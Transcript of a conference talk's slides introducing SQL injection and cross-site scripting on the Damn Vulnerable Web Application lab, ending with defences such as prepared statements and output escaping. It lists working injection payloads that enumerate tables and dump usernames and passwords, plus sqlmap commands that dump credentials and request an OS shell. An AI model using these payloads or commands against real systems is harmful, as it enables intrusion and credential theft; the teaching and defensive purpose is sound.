Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)

/GrandParadePolandwww.grandparade.co.uk

SQL Injection and XSS - Basicswith examples on Damn Vulnerable Web Application

Paweł Cygal, Senior System Administrator at Grand Parade


Agenda:- What is SQL Injection?- SQLMAP - What is Cross site scripting ?- example of Session Hijacking


SQL Injectionl- SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

l- SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.


XSSl- Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications (but now always). XSS enables attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.


SQL Injection – what is wrong here? <?php

if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ];

// Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql_query( $query ) or die( '<pre>' . mysql_error() . '</pre>' );

// Get results $num = mysql_numrows( $result ); $i = 0; while( $i < $num ) { // Get values $first = mysql_result( $result, $i, "first_name" ); $last = mysql_result( $result, $i, "last_name" );

// Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";

// Increase loop count $i++; }

mysql_close();}?>


Answer

$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

In this example user can type anything for example: 1' or 1=1 --

Do not trust user input!!!


examples1' or 1=1 -- 1' union select 1,2 from users; -- 1' union select version(),user() from users; -- 1' union select user,password from users; -- -1' union select user,password from users; ---1' union select table_name,2 from information_schema.tables; -- -1' union select column_name,2 from information_schema.columns; -- -1' union select "zaslepka", concat(user,":",password) from users; --

SQLMAP:Current database:

sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=4k2qlghmpl74famhq4eejigki0; security=low' --current-db

Lis of all databases:sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --dbs

Show tables:sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa --tables

Show colums:sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users --columns

Show user and passsqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' -D dvwa -T users -C user,password --dump

Insert shella:sqlmap -u 'http://dvwa.gp/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='PHPSESSID=34ifesrh1506tm1bu5rhuo9di3; security=low' --current-db --os-shell


Solution- Prepared statements

Placeholders - (WHERE a = ? ... WHERE a = :col)prepare execute

- Stored procedurs

- Escaping special charsmysql_real_escape_string

/GrandParadePolandwww.grandparade.co.uk/GrandParadePolandwww.grandparade.co.uk

Cross site scripting – what is wrong here?

<?php

// Is there any input?if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end user echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';}

?>


Answer

No data validation for user input. User can type whatever he wantFor example HTML tags or some javascript code.

Do not trust user!!!


Solution

Eascape special chars- htmlspecialchars- addslashes

Always validate input from user


The endThank you

Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)

Technology

Transcript of Pawel Cygal - SQL Injection and XSS - Basics (Quality Questions Conference)